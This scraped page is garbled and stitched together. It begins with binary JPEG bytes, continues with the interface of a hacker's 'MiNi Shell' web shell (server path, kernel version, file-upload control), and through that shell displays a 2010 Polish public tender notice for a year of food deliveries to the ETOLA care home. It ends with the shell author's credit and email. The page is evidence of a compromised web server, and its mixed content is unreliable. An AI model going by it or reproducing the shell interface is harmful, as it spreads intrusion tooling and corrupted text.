JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101201/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101201/344125-N-2010.html

<p class="kh_header"><b>Końskie: Przedmiotem zamówienia jest  dostawa artykułów żywnościowych do Domu Pomocy Społecznej ETOLA zgodnie z opisem  zawartym w rozdziale IV (części zamówienia)</b><br>
<b>Numer ogłoszenia: 344125 - 2010; data zamieszczenia: 01.12.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Konecki , ul. Staszica 2, 26-200 Końskie, woj. świętokrzyskie, tel. 0-41 372 41 34, faks 0-41 372 83 20.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest  dostawa artykułów żywnościowych do Domu Pomocy Społecznej ETOLA zgodnie z opisem  zawartym w rozdziale IV (części zamówienia).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Dostawa art. żywnościowych
1.1	Przedmiotem zamówienia jest zakup i dostawa artykułów żywnościowych zgodnie z wykazem   zamieszczonym w grupach I-V
1.2	Zamawiający dopuszcza składanie ofert równoważnych. Nazwy własne podane w grupach (np.  przyprawa Warzywko, ser żółty Gouda i inne) są tylko przykładowe. Wykonawca może zaproponować produkt o innej nazwie pod warunkiem, że posiadać on będzie te same walory smakowe i właściwości, co produkty podane przykładowo. W takim przypadku należy zaznaczyć, jakiego produktu dotyczy oferta równoważna.
1.3	 Wymogi dodatkowe:
- artykuły będące przedmiotem zamówienia powinny być pierwszej jakości, posiadać wymagane atesty i terminy ważności, być odpowiednio opakowane i transportowane w warunkach spełniających wszystkie wymogi sanitarne.
-dostawa na koszt i ryzyko transportem wykonawcy do magazynu zamawiającego
- dostawy częściowe, sukcesywne, uruchamiane telefonicznie.
-zmiana cen w trakcie realizacji umowy może nastąpić tylko na skutek okoliczności których nie można było  przewidzieć w chwili jej zawarcia lub zmiany te są korzystne dla zamawiającego
1.4	 Ilości podane w grupach I- V są szacunkowe i mogą ulec zmianie (zmniejszeniu lub zwiększeniu nie więcej niż o 20%). Z tego tytułu wykonawcy nie będą przysługiwały żadne roszczenia wobec zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie Wykonawcy o spełnianiu warunków określonych w art. 22 ust. 1 PZP (wg wzoru stanowiącego załącznik nr 1A do formularza ofertowego);</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.konecki.wrota-swietokrzyskie.pl/web/guest/dps_ruda_pilczycka_zamowienia_publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej ,ETOLA
Ruda Pilczycka 57
26-234 Słupia
Dział Administracyjno-Gospodarczy.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.12.2010 godzina 14:00, miejsce: Oferty należy składać w siedzibie realizatora zamówienia tj.  Dom Pomocy Społecznej ETOLA Ruda Pilczycka 57 ,26-234 Słupia, Dział Administracyjno - Gospodarczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Grupa I    Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Chleb zwykły krojony                                   1 kg	Szt.	11 500
2.		Chleb pełnoziarnisty krojony                       1kg	Szt.	500 
3.		Chleb razowy krojony                                   1 kg	Szt.	600
4.		Bułka  typu wrocławska                             100 g	Szt.	25 000
5.		Bułka razowa                                               100 g	Szt.	1 500
6.		Bułka pełnoziarnista                                   100 g	Szt.	1 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Grupa II     Przetwory sypkie, przyprawy, produkty strączkowe, 
przetwory, napoje.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Cukier                                                                      1 kg	kg	2 300
2.		Mąka pszenna typ 500                                         1 kg	kg	500
3.		Kasza jęczmienna                                                  1 kg	kg	250
4.		Kasza gryczana                                                       1 kg	kg	120
5.		Kasza manna                                                          1 kg	kg	120
6.		Ryż biały                                                                  1 kg	kg	350
7.		Sól                                                                            1 kg	kg	400
8.		Bułka tarta                                                             1  kg	kg	180
9.		Makaron jajeczny  nitki                                        1 kg	kg	400
10.		Makaron świderki                                                  1 kg	kg	300
11.		Makaron łazanki                                                    1 kg	Kg	100
12.		Makaron muszelki                                                 1 kg	Kg	160
13.		Makaron kokardki                                                 1 kg	Kg	50
14.		Makaron spaghetti                                                1 kg	Kg	80
15.		Zacierki                                                                    1 kg	kg	120
16.		Mąka ziemniaczana                                               1 kg	kg	10
17.		Mąka żytnia typ 500                                              1 kg	kg	100
18.		Płatki jęczmienne                                                  1 kg	kg	70
19.		Płatki kukurydziane                                               1 kg	kg	60
20.		Płatki owsiane                                                        1 kg	kg	70
21.		Kasza kukurydziana                                               1 kg	kg	80
22.		Papryka słodka                                                       20 g	Szt.	100
23.		Papryka ostra                                                         20 g	Szt.	50
24.		Pieprz naturalny mielony                                     20 g	Szt.	400
25.		Pieprz ziołowy                                                        20 g	Szt.	350
26.		Majeranek                                                                 8 g	Szt.	110
27.		Liść laurowy                                                              7 g	Szt.	50
28.		Kwasek cytrynowy                                                 20 g	Szt.	140
29.		Przyprawa typu Warzywko                                  1 kg	kg	45
30.		Groszek konserwowy                                         400 g	Szt.	600
31.		Kukurydza konserwowa                                     400 g	Szt.	350
32.		Ananas plastry                                                     565 g	Szt.	150
33.		Aromaty                                                                  10 g	Szt.	100
34.		Budyń                                                                      68 g	Szt.	550
35.		Cukier waniliowy                                                   32 g	Szt.	150
36.		Cynamon                                                                 20 g	Szt.	30
37.		Herbata                                                                   1 kg	kg	70
38.		Kakao                                                                     200 g	Szt.	40
39.		Kawa zbożowa                                                     500 g	Szt.	40
40.		Kisiel                                                                        65 g	Szt.	1 400
41.		Marmolada                                                             1 kg	kg	110
42.		Ocet                                                                         0,5 l	Szt.	10
43.		Pasztet typu Mazowiecki                                    460g	Szt.	300
44.		Pasztet drobiowy   typu podlaski                     155 g                                              	Szt.	800
45.		Konserwa mięsna typu 
Przysmak Śniadaniowy                                       300 g	Szt.	500
46.		Proszek do pieczenia                                            30 g	Szt.	25
47.		Szynka konserwowa mielona                            110 g	Szt.	800
48.		Zupa pieczarkowa                                                 35 g	Szt.	350
49.		Zupa grzybowa                                                       45 g	Szt.	450
50.		Zupa ogonowa                                                       41 g	Szt.	250
51.		Galaretka owocowa                                              79 g	Szt.	550
52.		Margaryna zwykła                                                 1 kg	kg	210
53.		Margaryna śniadaniowa                                       1 kg	kg	550
54.		Masło roślinne                                                     250 g	Szt.	1150
55.		Szprot w pomidorach                                         175 g	Szt.	600
56.		Szprot w oleju                                                      180 g	Szt.	600
57.		Paprykarz typu szczeciński                                310 g	Szt.	30
58.		Tuńczyk w oleju                                                   170 g	Szt.	800
59.		Sałatka rybna                                                        160g	Szt.	1300
60.		Filety śledziowe w oleju                                     175 g	Szt.	600
61.		Filety śledziowe w pomidorach                        175 g	Szt.	600
62.		Ogórki konserwowe                                            860 g	Szt.	420
63.		Rodzynki                                                                 1 kg	kg	5
64.		Koncentrat pomidorowy 30%                            990g	Szt.	150
65.		Chrzan tarty                                                         180 g	Szt.	210
66.		Szczaw konserwowy                                           300 g	Szt.	80
67.		Majonez typu kielecki                                        500 g	Szt.	420
68.		Musztarda   typu stołowa                                  190 g	Szt.	320
69.		Fasola typu Jaś                                                       1 kg	kg	80
70.		Groch łuskany                                                         1 kg	Kg	150
71.		Przyprawa w płynie                                                  1 l	l	90
72.		Dżem wiśniowy                                                    280 g 	Szt.	90
73.		Dżem truskawkowy                                            280 g	Szt.	90
74.		Dżem wieloowocowy                                         280 g	Szt.	80
75.		Powidła węgierkowe                                          320 g	Szt.	30
76.		Olej typu uniwersalny                                              5 l	Szt.	80
77.		Ketchup                                                                 450 g	Szt.	190
78.		Miód wielokwiatowy                                          380 g	Szt.	90
79.		Herbata  Earl Grey                                             100 g	Szt.	20
80.		Herbata owocowa Saga (op. 25 torebek)	op.	50
81.		Wafle ryżowe wieloziarniste                               75 g	Szt.	10
82.		Ciastka biszkopty                                                 120 g	Szt.	80
83.		Suchary delikatesowe                                        290 g 	Szt.	10
84.		Kostki rosołowe wołowe                                      60 g	Szt.	140
85.		Kostki rosołowe drobiowe                                   60 g	Szt.	150
86.		Mlekołaki kulki, kółka kakaowe                        300 g	Szt.	50
87.		Brzoskwinie w syropie                                        820 g	Szt.	80
88.		Pomidory obierane                                             400 g	Szt.	160
89.		Pieczarki marynowane                                       770 g	Szt.	150
90.		Papryka konserwowa                                         660 g	Szt.	150
91.		Fasola czerwona konserwowa                           380g	Szt.	200
92.		Barszcz czerwony (koncentrat)                      330 ml	Szt. 	70
93.		Kaszka mleczno -ryżowa truskawkowa            230g 	Szt.	20
94.		Drożdże świeże                                                     100g	Szt.	120
95.		Sok pomidorowy                                                       1 l	Szt.	10
96.		Syrop owocowy typu Premium                   490ml
różne smaki	Szt.	630
97.		Wiórki kokosowe                                                 100 g	Szt.	15
98.		Śliwki suszone                                                      125 g	Szt.	20
99.		Żelatyna spożywcza                                              30 g 	Szt.	60
100.		Morele suszone                                                   130 g	Szt.	10
101.		Imbir mielony                                                         20 g	szt.	25
102.		Marynata staropolska                                           20 g	Szt.	130
103.		Marynata klasyczna                                              20 g	Szt.	100
104.		Przyprawa do drobiu                                            20 g	Szt.	120
105.		Susz Warzywny                                                    100 g	Szt.	40
106.		Pietruszka Suszona                                                10 g                                   	Szt.	100
107.		Kminek                                                                    20 g	Szt.	50
108.		Ziele angielskie                                                       15 g	Szt.	60
109.		Gałka muszkatołowa                                             15 g	Szt.	30
110.		Zioła prowansalskie                                              10 g	Szt.	70
111.		Przyprawa do ziemniaków                                   20 g	Szt.	100
112.		Oregano                                                                  10 g	Szt.	30
113.		Bazylia                                                                     10 g	Szt.	30
114.		Przyprawa do ryb                                                  20 g	Szt.	60
115.		Koperek suszony                                                    10 g	Szt.	120
116.		Woda mineralna gazowana                                 1,5 l	Szt.	1 000
117.		Woda mineralna niegazowana                           1,5 l	Szt.	200
118.		Krem do smarowania pieczywa o smaku czekoladowym                                                     190 g	Szt.	80
119.		Krem do smarowania pieczywa o smaku orzechowym                                                        190 g	Szt.	100
120.		Kurkuma (przyprawa)                                          20 g	Szt.	30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Grupa III  Drób i przetwory drobiowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Kurczak schłodzony	kg	560
2.		Korpusy z kurczaka	kg	450
3.		Filet z kurczaka	kg	550
4.		Ćwiartki  z kurczaka	kg	1 050
5.		Filet z indyka	Kg	50
6.		Podudzie z indyka	Kg	50
7.		Wątróbka drobiowa	Kg	200
8.		Żołądki z kurczaka	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Grupa IV       Nabiał i przetwory nabiałowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Mleko w proszku odtłuszczone	kg	1 000
2.		Śmietana  24 %                                           400 g	Szt.	1 000
3.		Twaróg  tłusty 	kg	330
4.		Masło typu extra                                        250 g	Szt.	800
5.		Ser żółty typu Gouda	kg	250
6.		Jogurt owocowy                                        150 g	Szt.	6000
7.		Jogurt naturalny                                         450 g	Szt.	1 300
8.		Serek topiony typu Hochland                   100 g	Szt.	1 400
9.		Serki waniliowe                                           100 g	Szt.	350
10.		Serki owocowe                                            100 g	Szt.	350
11.		Kefir                                                              400 g	Szt.	500
12.		Śmietana w kartonie 36% poj.               200 ml	Szt.	80
13.		Śmietana w kartonie 18% poj.               200 ml	Szt.	150
14.		Śmietana w kartonie 12% poj.                400ml	Szt.	300
15.		Ser typu Feta  	Kg	12.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Grupa V         Mięso wieprzowe , mięso  wołowe, wędliny
 i wyroby podrobowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Nazwa artykułu	Jednostka miary	Roczna ilość
1.		Żeberka wieprzowe	kg	350
2.		Boczek surowy bez skóry wieprzowy 	kg	250
3.		Schab z bez kości wieprzowy	kg	210
4.		Szynka bez kości wieprzowa bez skóry	kg	240
5.		Łopatka bez kości wieprzowa bez skóry	kg	250
6.		Słonina wieprzowa bez skóry	kg	200
7.		Podroby wieprzowe bez wątroby	kg	250
8.		Podgardle wieprzowe	kg	20
9.		Głowizna wieprzowa	kg	350
10.		Mięso wieprzowe II 	kg	360
11.		Wątroba wieprzowa 	kg	150
12.		Karczek wieprzowy bez kości	Kg	180
13.		Udziec wołowy bez kości	Kg	80
14.		Kiełbasa typu szynkowa wieprzowa	kg	150
15.		Kiełbasa typu  mielonka tyrolska	Kg	260
16.		Mortadela	Kg	300
17.		Kiełbasa cienka zwyczajna	kg	420
18.		Kiełbasa parówkowa wieprzowa	kg	400
19.		Kiełbasa typu krakowska	kg	210
20.		Kiełbasa biała żurkowa	kg	300
21.		Szynka wędzona	kg	20
22.		Baleron wędzony	kg	20
23.		Boczek wędzony	Kg	90
24.		Pasztet pieczony wieprzowy	Kg	150
25.		Salceson typu włoski	kg	200
26.		Salceson typu czarny	kg	200
27.		Pasztetowa	kg	220
28.		Kaszanka jęczmienna	kg	300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com